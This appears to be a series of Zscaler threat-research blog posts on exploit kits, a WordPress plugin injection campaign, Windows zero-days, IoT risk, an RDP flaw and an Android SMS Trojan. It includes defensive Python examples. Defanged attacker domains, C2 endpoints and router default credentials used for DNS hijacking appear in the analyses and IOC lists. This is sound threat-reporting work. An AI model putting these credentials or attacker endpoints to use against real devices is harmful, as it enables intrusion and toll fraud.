Top exploit kit activity roundup – Spring 2019
This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.
RIG EK
RIG EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit's behavior compared to the previous quarter. Below we can see the hits for RIG EK activity.
Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019.
The geographical distribution of RIG EK hits is shown below.
Figure 2: RIG EK heat map showing infection regions
One instance of RIG EK activity can be seen below.
Figure 3: RIG EK infection cycle
The obfuscated JavaScript on the landing page is shown below.
Figure 4: RIG EK Landing page Obfuscated JavaScript.
We observed the use of two malicious scripts on the landing page, the first one being CVE-2016-0189, which is a Scripting Engine Memory Corruption Vulnerability targeting IE 11 and below. The second script was CVE-2018-8174, which is a Windows VBScript Engine Remote Code Execution vulnerability targeting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of Adobe Flash exploit CVE-2018-4878, which is a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting the CVE-2018-4878 vulnerability can be seen in the decompiled flash file below.
Figure 5: Decompiled Flash exploit in RIG EK cycle; CVE-2018-4878
The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.
Underminer EK
Underminer EK is relatively new and we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below.
Figure 6: Underminer EK Hits from 1 March 2019 to 20 May 2019.
The geographical distribution of Underminer EK hits is shown below.
Figure 7: Underminer EK heat map showing infection regions.
An infection cycle for Underminer EK is shown below.
Figure 8: Underminer EK infection cycle
The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS which further redirects the user to the Underminer EK landing page. The call for the Underminer EK on the malicious domain adpop[.]live is shown below.
Figure 9: Underminer EK landing page call on malvertisement page
This landing page contains a call to the malicious SWF payload. This call can be seen in the screenshot below.
Figure 10: Underminer EK call for Flash exploit
The malware payload seen in this cycle was a bootkit Trojan.
Spelevo EK
We started seeing activity for a new exploit kit called Spelevo in March 2019. The Spelevo EK authors integrated the relatively new Flash exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below.
Figure 11: Spelevo EK Hits from 1 March 2019 to 20 May 2019
The geographical distribution of Spelevo EK hits is shown below.
Figure 12: Spelevo EK heat map showing infection regions
An infection cycle for Spelevo EK is shown below.
Figure 13: Spelevo EK infection cycle
The image below shows the Spelevo EK malvertisement redirect to the EK landing page.
Figure 14: Spelevo EK malvertisement redirect
The Spelevo EK landing page contains an obfuscated JavaScript browser plugin detection script that determines the Adobe Flash Player version running on the user's system. The obfuscated JavaScript, along with the decoded script, is shown in the image below.
Figure 15: Spelevo EK landing page and deobfuscated browser plugin detect JavaScript
The same page serves a redirect URL based on the conditions met.
Figure 16: Spelevo EK Flash Player plugin detect
Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file that exploits a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier.
The cycle did not serve any malware payload on our test machine, but malware activity following successful exploitation has been reported in the wild.
Other exploit kits
We also observed some exploit kit activity directed at routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below.
Figure 17: Scan script served by a router exploit kit
Based on the target IP addresses seen online, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below.
Figure 18: Obfuscated JavaScript on a router exploit kit landing page
A Base64 decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials. In this case, the script is attempting to log in with user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4).
Figure 19: Base64 decoded JavaScript showing the DNS hijacking configuration
Another instance of a default credential being used to target routers is shown below.
Figure 20: Default credentials being targeted by router exploit kits
Here we see password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that this might have been used as default password by a few Brazilian ISPs and has been used before in similar attacks.
Checking the name resolution using the attacker's DNS server shows the DNS redirect behavior in action, as shown below.
Figure 21: DNS resolution using the attacker’s DNS server shows name resolution to a phishing IP
In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims.
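The hijack described above leaves two observable traces on the victim side: the gateway hands out a resolver address nobody approved (here paired with a legitimate public backup, which makes the configuration look half-normal), and that resolver returns different answers for well-known names than trusted resolvers do. The following added example, written for this page and not code from the post or from Zscaler, checks both. The allowlist, the resolver answer sets and the 198.51.100.x / 203.0.113.x addresses are constructed sample data; only the attacker resolver address and the 8.8.4.4 backup come from the post.

```python
import ipaddress

# Constructed allowlist: resolvers the organisation expects its gateways to hand out.
# Replace with your ISP's resolvers plus whichever public resolvers you approve.
TRUSTED_RESOLVERS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1"}


def audit_dns_servers(servers, trusted=TRUSTED_RESOLVERS):
    """Return the resolver entries that are neither private (the gateway itself is
    a normal entry) nor on the allowlist. Any single unknown entry is flagged: the
    pattern in the post, one rogue primary plus a legitimate backup, would slip
    through a check that only fires when every entry is bad."""
    suspicious = []
    for entry in servers:
        try:
            ip = ipaddress.ip_address(entry)
        except ValueError:
            # Not a literal address at all (e.g. a hostname): treat as unexpected.
            suspicious.append(entry)
            continue
        if ip.is_private or str(ip) in trusted:
            continue
        suspicious.append(str(ip))
    return suspicious


def compare_resolutions(answers_by_resolver, trusted=TRUSTED_RESOLVERS):
    """answers_by_resolver maps resolver address -> set of IPs it returned for one
    hostname. A resolver whose answer shares no address with the union of the
    trusted resolvers' answers is reported with its answers, sorted."""
    trusted_answers = set()
    for resolver, ips in answers_by_resolver.items():
        if resolver in trusted:
            trusted_answers |= set(ips)
    divergent = {}
    for resolver, ips in answers_by_resolver.items():
        if resolver in trusted:
            continue
        if not (set(ips) & trusted_answers):
            divergent[resolver] = sorted(ips)
    return divergent


# Constructed sample: DNS servers read from a compromised gateway's WAN settings.
SAMPLE_GATEWAY_DNS = ["158.255.7.150", "8.8.4.4"]

# Constructed sample: answers for www.google.com from each resolver. The addresses
# are documentation-range placeholders, not real Google or phishing servers.
SAMPLE_ANSWERS = {
    "8.8.8.8": {"198.51.100.20"},
    "8.8.4.4": {"198.51.100.20"},
    "158.255.7.150": {"203.0.113.10"},
}

if __name__ == "__main__":
    print("unexpected resolvers:", audit_dns_servers(SAMPLE_GATEWAY_DNS))
    print("divergent answers:", compare_resolutions(SAMPLE_ANSWERS))
```

In a deployment the two inputs come from the gateway's DHCP/WAN configuration and from live lookups of a handful of high-value names (mail, banking, the corporate portal) against each configured resolver; an entry in either result is worth an alert, since the victim's browsing looks entirely normal to the user.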
GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.
Conclusion
This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective, as they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize the successful infections in a variety of ways, such as by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit codes into their EKs, and security researchers analyze and block the new threats by tracking changes in the EK behavior.
To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.
Categories: Security Posts
Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used.
A stored cross-site scripting vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init hook" and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patched version, 8.0.27, was released on May 16, 2019; version 8.0.27 and higher are fixed.
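Because the fix is purely a version boundary (everything below 8.0.27 is affected), the first thing a site owner or responder wants is a reliable way to read the installed version out of the plugin header and compare it correctly. The added example below is written for this page, not code from the post or from the plugin; it parses the standard WordPress plugin header format (the "Version:" line in the main PHP file's header comment) and compares versions numerically, which matters because a string comparison would rank "8.0.3" above "8.0.27". The plugin directory slug and the sample header are assumptions; the fixed version comes from the post.

```python
import re
from pathlib import Path

# Assumed directory slug for the plugin under wp-content/plugins; adjust to your install.
PLUGIN_DIR = "wp-content/plugins/wp-live-chat-support"
# First fixed release, as stated in the post.
FIXED_VERSION = "8.0.27"

# Matches the "Version:" line of a WordPress plugin header, with or without a leading " * ".
HEADER_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)\s*$", re.MULTILINE)


def parse_version(version):
    """'8.0.27' -> (8, 0, 27). Non-numeric suffixes ('27-beta') keep their leading digits."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def version_from_header(php_source):
    """Return the Version: value from a plugin header comment, or None if there is none."""
    m = HEADER_RE.search(php_source)
    return m.group(1) if m else None


def is_vulnerable(installed, fixed=FIXED_VERSION):
    """True when installed < fixed, comparing component-wise and padding short versions
    so that '8.1' is treated as 8.1.0 rather than compared against a longer tuple."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def audit_plugin_dir(plugin_dir=PLUGIN_DIR):
    """Scan the plugin directory's top-level PHP files for a header and report
    (version, vulnerable). (None, None) means no header was found."""
    for php in sorted(Path(plugin_dir).glob("*.php")):
        version = version_from_header(php.read_text(errors="replace"))
        if version:
            return version, is_vulnerable(version)
    return None, None


# Constructed sample header in the WordPress plugin header format (not the real plugin file).
SAMPLE_HEADER = """<?php
/*
Plugin Name: WP Live Chat Support
Plugin URI: https://example.invalid/
Version: 8.0.26
*/
"""

if __name__ == "__main__":
    v = version_from_header(SAMPLE_HEADER)
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
    print(audit_plugin_dir())
```

Run audit_plugin_dir() from the WordPress document root; it is read-only and safe to schedule, and the same parse_version/is_vulnerable pair serves for any plugin advisory that states a "fixed in" version.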
ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script that is responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet seen as a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites).
Fig 1: Hits of the compromised WordPress sites
Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin
Fig 3: Obfuscated script injected in the compromised WordPress site
Fig 4: Deobfuscated version of the injected script
The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script.
Fig 5: Request and response to the hxxps://blackawardago[.]com
After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages.
Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script.
Fig 7: Popups after execution of the malicious script
The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address.
Fig 8: Whois information of the domain
Conclusion
Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as in the popular plugins found on many websites. An unpatched vulnerability in either the CMS or its plugins gives attackers an entry point to compromise the website by injecting malicious code, affecting the unsuspecting users who visit these sites.
It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise.
The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.
IOCs
blackawardago[.]com
216[.]10[.]243[.]93
List of compromised sites is available here.
Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows
Background
A security researcher (using the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. The POCs and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities and have been tested to work on Windows 10 only. The third is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, Microsoft has not released a patch for these vulnerabilities.
What is the issue?
The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.
The first vulnerability – angrypolarbearbug2 – can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.
The second vulnerability – bearlpe – targets the way the Windows task scheduler service uses the SetJobFileSecurityByName() function to write DACL for the job file. For this exploit to work, one needs to have "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.
The third vulnerability – sandboxescape – bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL in the IE process. According to reports, this exploit cannot be triggered remotely.
What systems are impacted?
The POC has been tested on Windows 10 32-bit and 64-bit and IE11.
Zscaler coverage
Advanced Threat Signatures:
Win32.Exploit.Bearlpe
Win32.Exploit.CVE.2019.0863
Win32.Exploit.Polarbearescape
W32/Agent.NBHI
Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
IoT traffic in the enterprise is rising. So are the threats.
Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime.
IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled.
Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise.
Enterprises around the globe have been adopting the use of IoT products to improve organizational efficiency, enhance communications, and to gain insight into system performance.
According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products.
That translates to quite a bit of budget being dedicated to these devices.
IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.
Analyzing IoT transactions
To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019.
The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns.
The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices.
It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.
Emerging threats
The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users.
Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras.
In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide.
One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain-text channels instead of SSL-encrypted channels. While the use of unencrypted channels is a major weakness, it is only one of the problems with IoT devices: they are notorious for weak, preset passwords that often go unchanged.
Malware in IoT traffic
As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices.
The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices.
Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk:
Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date.
Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic.
Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access.
Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic.
Finally, deploy a solution that gives visibility of the shadow IoT devices already sitting inside the network, and verify that the safeguards above are applied to them.
Advanced security for IoT devices
IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern.
With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security?
The security of your enterprise hinges on your answer.
Read the entire report, IoT in the Enterprise: an analysis of traffic and threats. I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Deepen Desai is VP of Security Research at Zscaler
Critical Update: Windows Remote Desktop Services Vulnerability
Background
Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. One of the issues that was patched in today's update, CVE-2019-0708, is critical, and all Windows users should apply the patches immediately, regardless of whether or not they are running the vulnerable operating system. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems.
What is the issue?
CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system.
What makes this vulnerability unique, and alarming, is that an attacker attempting to exploit the vulnerability does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, this can and most likely will be exploited by malware authors to spread payloads rapidly, from unpatched system to unpatched system. There have been no exploitations detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruptions in organizations around the world in May 2017.
What systems are impacted?
Windows XP, Windows 2003, Windows 7, Windows Server 2008 R2, and Windows Server 2008 operating systems are vulnerable.
Windows 8 and Windows 10 operating systems are NOT vulnerable.
What can you do to protect yourself?
Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations:
For supported operating systems:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB
For unsupported end-of-life operating systems [Windows XP and 2003]:
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
Zscaler coverage
Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
Working together to understand the threat landscape
As a society, we are more connected than ever before. Our community is no longer just the people living nearby. It is now a global community, made up of disparate individuals connected not by proximity but by the internet.
As in almost any community, crime is a factor. In today’s digital society, that means cybercriminals, and they seem to be launching new attacks every day.
These cybercriminals have gone from lone hackers to sophisticated criminal organizations, launching attacks on individuals, corporations, and governments. As these criminals have become more organized, the challenge in fighting them has become more difficult. If the cybercriminals are working together to increase their chances of success, it makes sense that those who fight these bad actors should also work together.
Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to the findings in this report.
The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. The report analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches. It looks at how the results have or have not changed over the years and digs into the overall threat landscape and the actors, actions, and assets that are present in breaches.
The report delves into security incident patterns and describes how they correlate to the various industry verticals. In addition to these primary patterns, the report includes a subset of data to pull out financially motivated social engineering (FMSE) attacks, which are more focused on credential theft and duping people into transferring money into adversary-controlled accounts.
Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target. The most common tactic used in breaches was hacking (52 percent of the time), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as can be expected, financial gain was the most common motivation (71 percent).
These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators, such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events.
The number of organizations providing data continues to grow, with 66 organizations external to Verizon now contributing to this report. This community of data contributors represents an international group of public and private entities that understand the importance of sharing information to gain a better understanding of the threats we all face on a daily basis.
This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category with supporting telemetry information indicating the number of users affected by these security incidents and data breaches.
It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and this digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods, as long as there’s a potential payoff. And, since there is no sign of attackers stopping any time soon, it is up to all of us working in the cloud and cybersecurity industries to work together to make their job a lot more difficult.
I think Gloria Macapagal Arroyo, the 14th President of the Philippines, said it very well: “The power of one, if fearless and focused, is formidable, but the power of many working together is better.”
Download the entire Verizon 2019 Data Breach Investigations Report.
Read more from the ThreatLabZ team.
Read about Zscaler cloud security here.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Deepen Desai is vice president of security research at Zscaler
From third-party Android store to SMS Trojan
Instead of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that isn’t available on the official store to seeking cracked apps—versions that have been modified to disable certain features, such as copyright protections—of official Android apps. Recently, the ThreatLabZ research team came across one of these third-party app stores that seemed to be hosting Android games. The store, called “Smart Content Store,” portrays itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com.
Fig 1: Third-party app store homepage
At first glance, the site appears to be an app store hosting Android games, but we were unable to download any apps. Clicking the Install option on any of the games, as seen in the screenshot above, leads back to the same page.
Upon further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs.
Fig 2: Zscaler dashboard
These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOC at the end of blog.)
App summary
APK Name: smartworld_-_WIN_-_500929091890143_-_.apk
Package name: vaya.bailecito.epore.saturda
Size: 2100203 bytes
MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90
Technical details
As soon as the app is installed, it appears as a blank space. As shown in the screenshot below, the app icon and app name are missing. Upon clicking the space (the invisible icon) the app displays its first activity with two options: Smart World and Sexy World.
Fig 3: Invisible app icon and the first activity
During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis we only received a 301 Moved Permanently response. These requests can be seen in the screenshot below.
Fig 4: Initial requests
Upon clicking either of the two options shown above, Smart World or Sexy World, the app asks for Administrator privileges, stating "To view all the porn videos you need to update. Click to activate.” This message can be seen in the screenshot below (left image).
Fig 5: Admin privileges
As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe that it is simply an indication to the attacker whether the victim has activated admin rights or not.
Fig 6: Request upon enabling admin rights
After a certain amount of time passes, the app starts sending requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. It sends the following information in its POST request:
Android version
Installation date
Version
Date (Date of request)
Country code
Carrier
Device ID
The screenshot below shows the request and response taking place between the compromised device and attacker:
Fig 7: Request and response related to the SMS message
The app acts according to the response received from the attacker’s domain. If the response contains "status":"OK", the app extracts the required details from it; in our case, these were a phone number and a message body. It then sends an SMS message with that body to that number. This functionality is visible in the screenshot below: the attacker's response is held in paramJSONObject, and based on its contents the app calls sendTextMessage, the routine that sends the actual SMS messages.
Fig 8: Sending SMS functionality
During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different text as the message body. This can result in high costs to the victim.
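The network behavior described above (beacons to the store's domains, then POSTs to the app_sms_request_get_number.php endpoint that returns the number and message body) is visible in web proxy logs long before the SMS charges arrive. The following added example, written for this page and not code from the post or from Zscaler, normalizes the defanged indicators from this post into matchable hostnames and scans proxy log lines for them and for the C2 path. The log format and the log lines are constructed sample data; the domains and the path come from the post.

```python
import re
from urllib.parse import urlsplit

# Indicators as published (defanged) in this post's text and IOC section.
RAW_IOCS = [
    "app.in-spicy(dot)com",
    "insidecontentsp(dot)com",
    "incontsmart(dot)com",
    "hxxp://play4funclub[.]com/public/notification/is-active",
]
# Path of the endpoint that hands the app a number and message body to send.
C2_PATH = "/scripts/app_sms_request_get_number.php"


def refang(indicator):
    """Undo common defanging so the indicator can be matched against real traffic."""
    s = indicator.replace("(dot)", ".").replace("[.]", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)


def host_of(indicator):
    """Reduce a domain or URL indicator to a lowercase hostname."""
    s = refang(indicator)
    if "://" in s:
        return (urlsplit(s).hostname or "").lower()
    return s.lower()


IOC_HOSTS = {host_of(i) for i in RAW_IOCS}


def host_matches(host, iocs=IOC_HOSTS):
    """Exact or subdomain match, so cdn.incontsmart.com matches incontsmart.com."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in iocs)


# Constructed log format: "<timestamp> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def scan_proxy_log(lines):
    """Return one hit per matching line with the client, host and the reasons it matched."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash the whole scan
        _ts, client, method, url, _status = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        reasons = []
        if host_matches(host):
            reasons.append("ioc-domain")
        if method.upper() == "POST" and parts.path == C2_PATH:
            reasons.append("sms-c2-path")
        if reasons:
            hits.append({"client": client, "host": host, "reasons": reasons})
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2019-05-20T10:00:01Z 10.0.0.5 GET http://play4funclub.com/public/notification/is-active 301",
    "2019-05-20T10:03:12Z 10.0.0.5 POST http://app.in-spicy.com/scripts/app_sms_request_get_number.php 200",
    "2019-05-20T10:03:20Z 10.0.0.7 GET https://www.example.com/ 200",
    "2019-05-20T10:04:00Z 10.0.0.9 POST http://cdn.incontsmart.com/x 200",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The "sms-c2-path" reason is deliberately independent of the domain list: if the operators move the same PHP endpoint to a new domain, the path match still fires, which is the kind of behavioral indicator worth keeping alongside the domain IOCs.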
Some examples of the SMS messages can be seen in the table below:
Phone #          Message Body
6768482371       message:france athletes employed
6857215675       message:experience iran yarn combines field
6768482371       message:luther exercise queens
2347003300131    message:hungary contributing task bird
6857215675       message:boolean wisconsin criticism verification republic
2347003300131    message:exchange audience nc medicaid
2347003300131    message:ut controlled salt customized consider
6768482371       message:legislative wayne brand hungarian
6768482371       message:consulting gui contrary eclipse
79697530171      message:boards tits difficulties
6768482371       message:royalty relay mv
6768482371       message:boards sie gabriel computer
6768482371       message:mods html chronic
6768482371       message:integer coleman monsters
6745596671       message:capabilities labels addiction
6768482371       message:checking upskirt football possibilities
6745596671       message:academics actively matrix ga
2347003300131    message:incidence quality mrs estimated default
6745590060       message:estate mexican legal flour
6768482371       message:cleared connectivity divx
2347003300131    message:cafe activists our constantly
6745596671       message:brush accepted role
6745596671       message:plain weed senators reform framing
6745596671       message:represents fig answers signup
6745596671       message:animation failure lucas browser poetry
2347003300131    message:biodiversity present solving herbal regulations
6857215675       message:shakira wanna movie freight
6768482371       message:shipping uzbekistan senators optimize basically
6857215675       message:folks tamil cooper
6857215675       message:picking maine shapes men wives
This app also has permission to view the victim’s contact list, which means the app can easily spread itself using those contacts. We also found other high-level permissions and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings.
Conclusion
The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below.
Fig 9: Zscaler Cloud Sandbox
Zscaler advises Android users to download apps only from official app stores. Using third-party stores may lead to the installation of apps that have hidden, malicious intentions, as described in this case. We also advise users to keep the Unknown Sources option turned off at all times on their Android device. Keeping this option off prevents any third-party app from being installed directly on the device.
IOCs
Domains
app.in-spicy(dot)com
insidecontentsp(dot)com
incontsmart(dot)com
MD5
044b97016fdcd22c8c2211014e65c562
bb5a4cea098a29ac8533c561784908b4
58f237f346d81385eaa2005cd642e28c
f50091fbe2fef0c9501f242afb356c96
2cbf13b90b76300f9668c2660b9cbc35
5c68ff95c2278da0fcc13b4c46f7978b
091e91a9ed7202cd44dc5e1c4b3dcc90
88c2ccec249ff6df0fd525e09e700861
8ac5e78f4bc7212fcadd805c924ba67c
eaa2f149f33e35906095857064721044
